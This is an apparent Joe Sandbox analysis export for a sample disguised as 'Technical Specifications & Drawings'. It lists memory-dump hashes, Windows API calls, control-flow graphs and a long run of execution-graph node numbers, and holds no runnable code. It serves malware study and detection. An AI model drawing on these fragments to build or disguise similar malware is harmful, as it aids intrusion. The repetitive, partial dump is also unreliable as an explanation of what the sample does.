                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L$L
                                                  • API String ID: 0-166189556
                                                  • Opcode ID: c23c34ffefe7d33f61fb2bcd889f52305f1037eec05aa282b2edde6dbb1b6fc6
                                                  • Instruction ID: be948d7efc05183e9ee80597594dd9002c1ad06e2021faec7068aecc13cd32c3
                                                  • Opcode Fuzzy Hash: c23c34ffefe7d33f61fb2bcd889f52305f1037eec05aa282b2edde6dbb1b6fc6
                                                  • Instruction Fuzzy Hash: F6918138E103198FCF04DFB0D8949EDB7B6EF8A304F548615E416BB2A4EB74A945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L$L
                                                  • API String ID: 0-166189556
                                                  • Opcode ID: 1de040b6abda872c33045f55f7e2d7ded326345dc507dd489ae45c730b881ac5
                                                  • Instruction ID: 23aa07bb2ad47d079052f7ba1c4aa77cc8b1f4f465c4901a585918092bf2781b
                                                  • Opcode Fuzzy Hash: 1de040b6abda872c33045f55f7e2d7ded326345dc507dd489ae45c730b881ac5
                                                  • Instruction Fuzzy Hash: BF91B239D103498FCB05DFB0C8949DDBBB6FF8A300F548655E416AF2A1EB74A855CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d296a8202d2288ee1c8fa091365611dc57dd61837233aa41eda552af91702cf5
                                                  • Instruction ID: ef8416ca9d578e65a74431fd576a426a7592b8a65399e59ef9191414435be79e
                                                  • Opcode Fuzzy Hash: d296a8202d2288ee1c8fa091365611dc57dd61837233aa41eda552af91702cf5
                                                  • Instruction Fuzzy Hash: 2DC129B9E917468BD710DF65E8881893FE1BB65328FD0CA0BD1616BAD0D7B4106ECF48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C248
                                                  • GetCurrentThread.KERNEL32 ref: 00E7C285
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C2C2
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E7C31B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 75f5f7e55d9881bd08d65f2fcb849341de1f6269140dded3f686dff5d51f5fc1
                                                  • Instruction ID: 70b51c02b361a9306617fe3ab6aa3c84a2a01201fe6ed7d62ddf4b0d07070bfb
                                                  • Opcode Fuzzy Hash: 75f5f7e55d9881bd08d65f2fcb849341de1f6269140dded3f686dff5d51f5fc1
                                                  • Instruction Fuzzy Hash: 825154B4D006888FDB10CFA9C5487DEBBF4AF48318F24C499E409B77A1D7745988CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C248
                                                  • GetCurrentThread.KERNEL32 ref: 00E7C285
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C2C2
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E7C31B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 18b5086663d54558b7f85b79d806dbf9fbc32143d7b6139cee3662094583a523
                                                  • Instruction ID: 3d9cc9ea4726309c407041dd0478670b1cfc32aeb2546b46419b7fb3cd129fb5
                                                  • Opcode Fuzzy Hash: 18b5086663d54558b7f85b79d806dbf9fbc32143d7b6139cee3662094583a523
                                                  • Instruction Fuzzy Hash: 155143B4D006488FDB10CFA9D548BDEBBF5AB88318F24C459E409B77A0D7746988CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7A14E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f9a9c766cf0a91fd830ec8c6bf0307b42bffbfe4f2d1b1ded67f6df6d2a9f88e
                                                  • Instruction ID: 4066dfb69bdf63304c60888323960c987a2efe8a9f7af97b532e5eff17a068d8
                                                  • Opcode Fuzzy Hash: f9a9c766cf0a91fd830ec8c6bf0307b42bffbfe4f2d1b1ded67f6df6d2a9f88e
                                                  • Instruction Fuzzy Hash: A0712670A00B058FD724DF69D04579AB7F1BF88308F04892DE44AE7B51EB74E84ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028E0A4A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 08a04d12a283323a4eb99115b97c2443f7c1a07da276ba611170417222f6f86d
                                                  • Instruction ID: 98105c686545a9833e89fb972e95017f9e95c5a7f27e9dbf8013728dc989affb
                                                  • Opcode Fuzzy Hash: 08a04d12a283323a4eb99115b97c2443f7c1a07da276ba611170417222f6f86d
                                                  • Instruction Fuzzy Hash: 6151EEB5D003489FDF14CFA9C884ADEBBB5BF49314F24852AE819AB210D7B49885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028E0A4A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1206 e75364-e7536a 1207 e7536e-e75431 CreateActCtxA 1206->1207 1208 e7536c 1206->1208 1210 e75433-e75439 1207->1210 1211 e7543a-e75494 1207->1211 1208->1207 1210->1211 1218 e75496-e75499 1211->1218 1219 e754a3-e754a7 1211->1219 1218->1219 1220 e754a9-e754b5 1219->1220 1221 e754b8 1219->1221 1220->1221 1223 e754b9 1221->1223 1223->1223
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00E75421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1224 e73e18-e75431 CreateActCtxA 1227 e75433-e75439 1224->1227 1228 e7543a-e75494 1224->1228 1227->1228 1235 e75496-e75499 1228->1235 1236 e754a3-e754a7 1228->1236 1235->1236 1237 e754a9-e754b5 1236->1237 1238 e754b8 1236->1238 1237->1238 1240 e754b9 1238->1240 1240->1240
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00E75421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1241 28e2ef0-28e2f2c 1242 28e2fdc-28e2ffc 1241->1242 1243 28e2f32-28e2f37 1241->1243 1250 28e2fff-28e300c 1242->1250 1244 28e2f8a-28e2fc2 CallWindowProcW 1243->1244 1245 28e2f39-28e2f70 1243->1245 1246 28e2fcb-28e2fda 1244->1246 1247 28e2fc4-28e2fca 1244->1247 1252 28e2f79-28e2f88 1245->1252 1253 28e2f72-28e2f78 1245->1253 1246->1250 1247->1246 1252->1250 1253->1252
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 028E2FB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1255 e7c40b-e7c4a4 DuplicateHandle 1256 e7c4a6-e7c4ac 1255->1256 1257 e7c4ad-e7c4ca 1255->1257 1256->1257
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7C497
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1260 e7c410-e7c4a4 DuplicateHandle 1261 e7c4a6-e7c4ac 1260->1261 1262 e7c4ad-e7c4ca 1260->1262 1261->1262
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7C497
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1265 e79468-e7a3b0 1267 e7a3b2-e7a3b5 1265->1267 1268 e7a3b8-e7a3e7 LoadLibraryExW 1265->1268 1267->1268 1269 e7a3f0-e7a40d 1268->1269 1270 e7a3e9-e7a3ef 1268->1270 1270->1269
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E7A1C9,00000800,00000000,00000000), ref: 00E7A3DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E7A1C9,00000800,00000000,00000000), ref: 00E7A3DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 028E0BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7A14E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 028E0BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  • Instruction Fuzzy Hash: 2CA19132E002198FCF15CFA5C8445DEBBF6FF89304B1595AAE909BB261EB31E915CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e492f657a54f4678133e262fa8a5e5574cfb7ea223ce431fddc0987b5b8a13ff
                                                  • Instruction ID: 5165518470727b44d2c893c669bb612694d80cd3d92689bf5bdca5d075c9b185
                                                  • Opcode Fuzzy Hash: e492f657a54f4678133e262fa8a5e5574cfb7ea223ce431fddc0987b5b8a13ff
                                                  • Instruction Fuzzy Hash: 2D612E38A103098FDF05DFA4C9949EEB7F6EF86304F254169E40AAB660EF30AD45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:0.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:61.7%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:87
17820 17bef0c 17819->17820 17821 17bef21 17819->17821 17820->17787 17822 17bef29 17821->17822 17871 17bef40 17821->17871 17822->17787 17825 17b6dba 17824->17825 17833 17b6da4 17824->17833 18199 17e2e1c 17825->18199 17827 17b6dbf 17828 17beef0 27 API calls 17827->17828 17829 17b6dca 17828->17829 17830 17b6dde 17829->17830 18204 17adb60 17829->18204 17832 17beb70 34 API calls 17830->17832 17832->17833 17833->17798 17833->17800 17833->17818 17835 17beb9e 17834->17835 17836 17beb81 17834->17836 17835->17784 17835->17792 17836->17835 17838 17bebac 17836->17838 18322 183ff10 17836->18322 17838->17835 18316 17a4dc0 17838->18316 17841 17bff99 17840->17841 17842 17bff6d 17840->17842 17843 18788f5 34 API calls 17841->17843 17842->17841 17845 17bff80 GetPEB 17842->17845 17844 17bff94 17843->17844 17844->17784 17845->17841 17846 17bff8f 17845->17846 18424 17c0050 17846->18424 17849 17dfd3a 17848->17849 17851 17dfd31 _vswprintf_s 17848->17851 17849->17851 18460 17b7608 17849->18460 17851->17804 17853 17dfdba GetPEB 17852->17853 17854 17dfdcc 17852->17854 17853->17854 17855 181c0bd 17854->17855 17856 17dfdf2 17854->17856 17859 17dfdfc 17854->17859 17857 181c0d3 GetPEB 17855->17857 17855->17859 17858 17b76e2 GetPEB 17856->17858 17856->17859 17857->17859 17858->17859 17859->17818 17861 17ab171 _vswprintf_s 12 API calls 17860->17861 17862 17ab16e 17861->17862 17862->17802 17864 17b75db 17863->17864 17865 17b75eb 17863->17865 17864->17865 17866 17b7608 GetPEB 17864->17866 17865->17810 17866->17865 17868 17b76e6 17867->17868 17870 17b76fd 17867->17870 17869 17b76ec GetPEB 17868->17869 17868->17870 17869->17870 17870->17813 17872 17bf0bd 17871->17872 17874 17bef5d 17871->17874 17872->17874 17909 17a9080 17872->17909 17876 17bf042 17874->17876 17877 17bf071 17874->17877 17879 17a2d8a 17874->17879 17876->17877 17878 17bf053 GetPEB 17876->17878 17877->17820 17878->17877 17880 17a2db8 17879->17880 17887 17a2df1 _vswprintf_s 17879->17887 17881 17a2de7 17880->17881 17880->17887 17915 
17a2e9f 17880->17915 17881->17887 17919 17d1624 17881->17919 17882 17ff9d0 GetPEB 17885 17ff9e3 GetPEB 17882->17885 17885->17887 17887->17882 17887->17885 17890 17a2e5a 17887->17890 17913 17c7d50 GetPEB 17887->17913 17926 183fe87 17887->17926 17933 183fdda 17887->17933 17939 183ffb9 17887->17939 17947 1835720 17887->17947 17891 17a2e61 17890->17891 17897 17a2e99 _vswprintf_s 17890->17897 17892 17a2e69 17891->17892 17893 17c7d50 GetPEB 17891->17893 17892->17874 17895 17ffa76 17893->17895 17898 17ffa8a 17895->17898 17899 17ffa7a GetPEB 17895->17899 17896 17a2ece 17896->17874 17897->17896 17962 17e95d0 LdrInitializeThunk 17897->17962 17898->17892 17902 17ffa97 GetPEB 17898->17902 17899->17898 17902->17892 17903 17ffaaa 17902->17903 17904 17c7d50 GetPEB 17903->17904 17905 17ffaaf 17904->17905 17906 17ffac3 17905->17906 17907 17ffab3 GetPEB 17905->17907 17906->17892 17950 1827016 17906->17950 17907->17906 17910 17a9098 17909->17910 17911 17a909e GetPEB 17909->17911 17910->17911 17912 17a90aa 17911->17912 17912->17874 17914 17c7d5d 17913->17914 17914->17887 17916 17a2ebb _vswprintf_s 17915->17916 17918 17a2ece 17916->17918 17963 17e95d0 LdrInitializeThunk 17916->17963 17918->17881 17964 17d16e0 17919->17964 17921 17d1630 17925 17d1691 17921->17925 17968 17d16c7 17921->17968 17923 17d165a 17923->17925 17975 17da185 17923->17975 17925->17887 17927 17c7d50 GetPEB 17926->17927 17928 183fec1 17927->17928 17929 183fec5 GetPEB 17928->17929 17930 183fed5 _vswprintf_s 17928->17930 17929->17930 18006 17eb640 17930->18006 17932 183fef8 17932->17887 17934 183fdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17933->17934 17935 1835720 _vswprintf_s 12 API calls 17934->17935 17936 183fe0f 17935->17936 17937 1835720 _vswprintf_s 12 API calls 17936->17937 17938 183fe39 17937->17938 17938->17887 17940 183ffc8 _vswprintf_s 17939->17940 18153 17de730 17940->18153 17942 1840067 _vswprintf_s 17944 17fd130 _vswprintf_s 12 API calls 17942->17944 17943 183ffd5 _vswprintf_s 17943->17942 17945 
1830c30 _vswprintf_s 12 API calls 17943->17945 17946 184009a 17944->17946 17945->17942 17946->17887 18159 17ab171 17947->18159 17951 1827052 17950->17951 17952 1827073 GetPEB 17951->17952 17957 1827084 17951->17957 17952->17957 17953 1827136 17955 17eb640 _vswprintf_s 12 API calls 17953->17955 17954 1827125 GetPEB 17954->17953 17956 1827147 17955->17956 17956->17892 17957->17953 17958 17c7d50 GetPEB 17957->17958 17961 1827101 _vswprintf_s 17957->17961 17959 18270ec 17958->17959 17960 18270f0 GetPEB 17959->17960 17959->17961 17960->17961 17961->17953 17961->17954 17962->17896 17963->17918 17965 17d16ed 17964->17965 17966 17d16f3 GetPEB 17965->17966 17967 17d16f1 17965->17967 17966->17967 17967->17921 17969 18155f4 17968->17969 17970 17d16da 17968->17970 17980 185bbf0 17969->17980 17970->17923 17974 181560a 17976 17da1a0 17975->17976 17977 17da192 17975->17977 17976->17977 17978 17da1b0 GetPEB 17976->17978 17977->17925 17979 17da1c1 17978->17979 17979->17925 17981 185bc12 17980->17981 17982 18155fb 17981->17982 17988 185c08a 17981->17988 17982->17974 17984 185bf33 17982->17984 17985 185bf4c 17984->17985 17987 185bf97 17985->17987 18001 185be9b 17985->18001 17987->17974 17989 185c0c6 17988->17989 17991 185c104 _vswprintf_s 17989->17991 17992 185bfdb 17989->17992 17991->17982 17994 185bfeb 17992->17994 17995 185bfef 17992->17995 17994->17991 17995->17994 17996 185bdfa 17995->17996 17997 185be17 17996->17997 17999 185be6d 17997->17999 18000 17e9660 LdrInitializeThunk 17997->18000 17999->17994 18000->17999 18002 185beb3 18001->18002 18003 185bf08 18002->18003 18005 17e9660 LdrInitializeThunk 18002->18005 18003->17987 18005->18003 18007 17eb64b 18006->18007 18008 17eb648 18006->18008 18011 185b590 18007->18011 18008->17932 18010 17eb74a _vswprintf_s 18010->17932 18014 185b260 18011->18014 18013 185b5a3 18013->18010 18072 17fd08c 18014->18072 18016 185b26c GetPEB 18017 185b279 GetPEB 18016->18017 18019 185b293 18017->18019 18020 185b54b 18019->18020 18021 185b48b 
18019->18021 18022 185b2ba 18019->18022 18028 185b56b _vswprintf_s 18020->18028 18073 1830c30 18020->18073 18023 1835720 _vswprintf_s 10 API calls 18021->18023 18024 185b414 18022->18024 18025 185b2c6 18022->18025 18026 185b49e 18023->18026 18027 1835720 _vswprintf_s 10 API calls 18024->18027 18029 185b32d 18025->18029 18030 185b2ce 18025->18030 18036 1835720 _vswprintf_s 10 API calls 18026->18036 18031 185b427 18027->18031 18028->18013 18038 185b396 18029->18038 18044 185b34d 18029->18044 18068 185b2eb 18029->18068 18033 185b2f3 18030->18033 18034 185b2da 18030->18034 18037 1835720 _vswprintf_s 10 API calls 18031->18037 18035 1835720 _vswprintf_s 10 API calls 18033->18035 18039 1835720 _vswprintf_s 10 API calls 18034->18039 18040 185b302 18035->18040 18041 185b4c2 18036->18041 18043 185b43e 18037->18043 18042 1835720 _vswprintf_s 10 API calls 18038->18042 18039->18068 18047 1835720 _vswprintf_s 10 API calls 18040->18047 18048 185b4cc 18041->18048 18057 185b320 18041->18057 18049 185b3aa 18042->18049 18050 1835720 _vswprintf_s 10 API calls 18043->18050 18051 1835720 _vswprintf_s 10 API calls 18044->18051 18045 1835720 _vswprintf_s 10 API calls 18046 185b4fd 18045->18046 18052 185b519 18046->18052 18059 1835720 _vswprintf_s 10 API calls 18046->18059 18053 185b311 18047->18053 18054 1835720 _vswprintf_s 10 API calls 18048->18054 18055 185b38f 18049->18055 18056 185b3b6 18049->18056 18050->18057 18058 185b361 18051->18058 18060 1835720 _vswprintf_s 10 API calls 18052->18060 18061 1835720 _vswprintf_s 10 API calls 18053->18061 18054->18068 18067 1835720 _vswprintf_s 10 API calls 18055->18067 18062 1835720 _vswprintf_s 10 API calls 18056->18062 18063 1835720 _vswprintf_s 10 API calls 18057->18063 18057->18068 18058->18055 18064 185b371 18058->18064 18059->18052 18065 185b528 18060->18065 18061->18057 18066 185b3c5 18062->18066 18063->18068 18069 1835720 _vswprintf_s 10 API calls 18064->18069 18065->18020 18071 1835720 _vswprintf_s 10 API calls 18065->18071 18070 1835720 
_vswprintf_s 10 API calls 18066->18070 18067->18068 18068->18045 18069->18068 18070->18068 18071->18020 18072->18016 18074 1830c50 18073->18074 18075 1830c49 18073->18075 18083 183193b 18074->18083 18075->18028 18077 1830c5e 18077->18075 18089 1831c76 18077->18089 18084 183194c 18083->18084 18088 1831967 _vswprintf_s 18083->18088 18106 1831c49 18084->18106 18086 1831c49 _vswprintf_s LdrInitializeThunk 18087 1831951 _vswprintf_s 18086->18087 18087->18086 18087->18088 18088->18077 18109 17e9670 18089->18109 18107 17e9670 _vswprintf_s LdrInitializeThunk 18106->18107 18108 1831c65 18107->18108 18108->18087 18110 17e967a _vswprintf_s LdrInitializeThunk 18109->18110 18154 17e9670 _vswprintf_s LdrInitializeThunk 18153->18154 18155 17de747 _vswprintf_s 18154->18155 18156 17de74b 18155->18156 18157 17de784 GetPEB 18155->18157 18156->17943 18158 17de7a8 18157->18158 18158->17943 18160 17ab180 _vswprintf_s 18159->18160 18161 17ab1b0 GetPEB 18160->18161 18168 17ab1c0 _vswprintf_s 18160->18168 18161->18168 18162 17fd130 _vswprintf_s 10 API calls 18163 17ab1de 18162->18163 18163->17887 18165 1804904 GetPEB 18166 17ab1d1 _vswprintf_s 18165->18166 18166->18162 18168->18165 18168->18166 18169 17ee2d0 18168->18169 18172 17ee2ed 18169->18172 18171 17ee2e8 18171->18168 18173 17ee30f 18172->18173 18174 17ee2fb 18172->18174 18176 17ee332 18173->18176 18177 17ee31e 18173->18177 18181 17eb58e 18174->18181 18186 17f2440 18176->18186 18179 17eb58e _vswprintf_s 12 API calls 18177->18179 18178 17ee307 _vswprintf_s 18178->18171 18179->18178 18182 17ab150 _vswprintf_s 12 API calls 18181->18182 18183 17eb627 18182->18183 18184 17eb640 _vswprintf_s 12 API calls 18183->18184 18185 17eb632 18184->18185 18185->18178 18187 17f24af 18186->18187 18188 17f249a 18186->18188 18189 17f24b7 18187->18189 18198 17f24cc __aulldvrm _vswprintf_s 18187->18198 18190 17eb58e _vswprintf_s 12 API calls 18188->18190 18191 17eb58e _vswprintf_s 12 API calls 18189->18191 18192 17f24a4 18190->18192 18191->18192 18193 
17eb640 _vswprintf_s 12 API calls 18192->18193 18194 17f2d6e 18193->18194 18194->18178 18195 17f2d4f 18197 17eb58e _vswprintf_s 12 API calls 18195->18197 18196 17f58ee 12 API calls __cftof 18196->18198 18197->18192 18198->18192 18198->18195 18198->18196 18200 17e2e32 18199->18200 18201 17e2e57 18200->18201 18212 17e9840 LdrInitializeThunk 18200->18212 18201->17827 18203 181df2e 18205 17adb6d 18204->18205 18211 17adb91 18204->18211 18205->18211 18213 17adb40 GetPEB 18205->18213 18207 17adb76 18207->18211 18215 17ae7b0 18207->18215 18209 17adb87 18210 1804fa6 GetPEB 18209->18210 18209->18211 18210->18211 18211->17830 18212->18203 18214 17adb52 18213->18214 18214->18207 18216 17ae7e0 18215->18216 18217 17ae7ce 18215->18217 18218 17ae7e8 18216->18218 18221 17ab150 _vswprintf_s 12 API calls 18216->18221 18217->18218 18223 17b3d34 18217->18223 18222 17ae7f6 18218->18222 18262 17adca4 18218->18262 18221->18218 18222->18209 18224 1808213 18223->18224 18225 17b3d6c 18223->18225 18229 180822b GetPEB 18224->18229 18245 17b4068 18224->18245 18278 17b1b8f 18225->18278 18227 17b3d81 18227->18224 18228 17b3d89 18227->18228 18230 17b1b8f 2 API calls 18228->18230 18229->18245 18231 17b3d9e 18230->18231 18232 17b3dba 18231->18232 18233 17b3da2 GetPEB 18231->18233 18234 17b1b8f 2 API calls 18232->18234 18233->18232 18235 17b3dd2 18234->18235 18237 17b3e91 18235->18237 18241 17b3deb GetPEB 18235->18241 18235->18245 18236 1808344 GetPEB 18239 17b407a 18236->18239 18240 17b1b8f 2 API calls 18237->18240 18238 17b4085 18238->18216 18239->18238 18243 1808363 GetPEB 18239->18243 18242 17b3ea9 18240->18242 18252 17b3dfc _vswprintf_s 18241->18252 18244 17b3f6a 18242->18244 18242->18245 18246 17b3ec2 GetPEB 18242->18246 18243->18238 18247 17b1b8f 2 API calls 18244->18247 18245->18236 18245->18239 18250 17b3ed3 _vswprintf_s 18246->18250 18248 17b3f82 18247->18248 18248->18245 18249 17b3f9b GetPEB 18248->18249 18251 17b3fac _vswprintf_s 18249->18251 18250->18245 